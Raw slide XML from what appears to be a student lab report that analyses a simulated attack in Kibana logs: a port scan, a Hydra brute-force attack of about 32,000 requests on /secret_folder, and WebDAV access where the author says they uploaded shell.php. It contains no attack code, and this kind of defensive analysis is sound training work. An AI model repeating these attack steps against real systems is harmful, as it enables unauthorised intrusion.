              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB4A6C53-A95F-6797-A8B4-DAE81879951E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3097999"/>
            <a:ext cx="3111303" cy="1818651"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F568CB9B-DEA5-86C5-0A0C-1F6BB8BC510B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2856919" y="3151771"/>
            <a:ext cx="1859777" cy="1711107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A6A15A6-2682-11E5-0BC5-09BFB8AE633D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716696" y="3205543"/>
            <a:ext cx="2933788" cy="1711107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="Table&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF92F3AA-E70D-2EE1-5D23-5F10970B50D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7041713" y="3471199"/>
            <a:ext cx="1764300" cy="144545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Identifying the Port Scan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Google Shape;1161;p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62" name="Google Shape;1162;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>[Insert Here]</a:t>
            </a:r>
            <a:endParaRPr>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en">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Include a screenshot of Kibana logs depicting the port scan. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A picture containing graphical user interface&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE8BA103-D1D1-6ADF-03D0-AC79CD38CA0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="169235" y="1430369"/>
            <a:ext cx="4002530" cy="2282762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{034E229A-7D91-DAEF-63C2-C2494E38D72D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4225038" y="1467800"/>
            <a:ext cx="4617574" cy="2028280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3694625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5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marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p5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This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p5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27" name="Google Shape;1027;p5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8" name="Google Shape;1028;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378813"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1029" name="Google Shape;1029;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621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30" name="Google Shape;1030;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="34032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 name="Google Shape;1031;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228725"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1032" name="Google Shape;1032;p55"/>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33" name="Google Shape;1033;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>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1034;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073850"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1035" name="Google Shape;1035;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="6213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36" name="Google Shape;1036;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="340325" cy="188625"/>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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923750"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1038" name="Google Shape;1038;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378813"/>
              <a:ext cx="695400" cy="621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39" name="Google Shape;1039;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969614" y="1607625"/>
              <a:ext cx="34032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0" name="Google Shape;1040;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12450" y="137882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Network Topology</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041" name="Google Shape;1041;p5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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="2233550"/>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45" name="Google Shape;1045;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="150" y="30762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46" name="Google Shape;1046;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="39189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6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1171" name="Google Shape;1171;p6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73" name="Google Shape;1173;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="117282" y="741300"/>
            <a:ext cx="8758557"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200" dirty="0"/>
              <a:t>The request for /secret_folder started 7/12/2022 @ 02:30 and 02:50 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>There were 32,118 requests </a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>Inside secret_folder was a folder called connect_to_corp_server</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="268160" y="835137"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB98021-3060-A878-84D8-B26849F432BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="268160" y="1490995"/>
            <a:ext cx="5139299" cy="1211634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Graphical user interface, text, website&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91427A11-8A46-CEC9-77B7-6F57ED055F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5502927" y="1060292"/>
            <a:ext cx="2974334" cy="2295045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1942540E-368D-5F47-10A5-B1014374CEAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4683834" y="2796324"/>
            <a:ext cx="4192006" cy="1887500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3D3C0E-C3C0-1DE8-A401-DB0B967B015B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="692861" y="3200245"/>
            <a:ext cx="3438385" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here we can see the requests for /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and only 2 successful hits for /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>connect_to_corp_server</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6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181" name="Google Shape;1181;p6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82" name="Google Shape;1182;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Include a screenshot of Kibana logs depicting the brute force attack.  </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367349" y="655902"/>
            <a:ext cx="8556732"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200" dirty="0"/>
              <a:t>How many requests were made in the attack? Here we can see that 32,082 packet requests were made by the Brute Force Attack by Hydra</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" lvl="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="810527"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D1B9120-1F44-90D0-A6B8-D45251CE50B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810482" y="1377869"/>
            <a:ext cx="5113599" cy="1467062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7DAB79A-7874-C289-F3CF-8324CF63AB0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="219918" y="1397273"/>
            <a:ext cx="3590565" cy="2634497"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F48D1FDB-9F34-D7FE-CDD4-0DD11A52C800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4345292" y="2844931"/>
            <a:ext cx="4578789" cy="201124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Finding the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Google Shape;1191;p6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92" name="Google Shape;1192;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1467800"/>
            <a:ext cx="8409300" cy="2384100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14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marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Add a screenshot of Kibana logs depicting the WebDAV connection.  </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268586" y="692559"/>
            <a:ext cx="5791200"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US" sz="1200" dirty="0"/>
              <a:t>62 request packets were made for the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> directory </a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>The file passwd.dav was located in the folder as well as the shell.php that we uploaded</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1194" name="Google Shape;1194;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="847184"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71C92B64-235E-5F5A-CB2D-FDBC8D943795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5440920" y="1433623"/>
            <a:ext cx="3335730" cy="2688254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4929334-3CE9-72C2-B069-56F677B2D3BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="60232" y="1410183"/>
            <a:ext cx="5615348" cy="1787743"/>
          </a:xfrm>
